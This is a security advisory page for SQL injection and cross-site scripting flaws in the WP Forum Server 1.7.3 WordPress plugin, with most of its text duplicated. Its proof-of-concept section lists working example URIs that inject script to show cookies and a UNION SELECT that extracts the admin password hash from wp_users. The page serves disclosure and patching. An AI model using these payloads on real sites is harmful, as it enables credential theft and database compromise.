WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
BID:53530
Info
WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 53530 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-6622 CVE-2012-6625 |
| Remote: | Yes |
| Local: | No |
| Published: | May 15 2012 12:00AM |
| Updated: | Jan 24 2014 12:23AM |
| Credit: | Heine Pedersen and Torben Jensen |
| Vulnerable: |
WordPress WP Forum Server 1.7.3 |
| Not Vulnerable: | |
Discussion
WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Forum Server 1.7.3 is vulnerable; other versions may also be affected.
WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Forum Server 1.7.3 is vulnerable; other versions may also be affected.
Exploit / POC
WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can use a browser to exploit these issues. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid='><script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=usergroups&do=edit_usergroup&usergroup_id='><script>alert(document.cookie);</script>
Attackers can use a browser to exploit these issues. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid='><script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=usergroups&do=edit_usergroup&usergroup_id='><script>alert(document.cookie);</script>
Solution / Fix
WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
WordPress WP Forum Server Plugin SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- WP Forum Server Homepage (WordPress)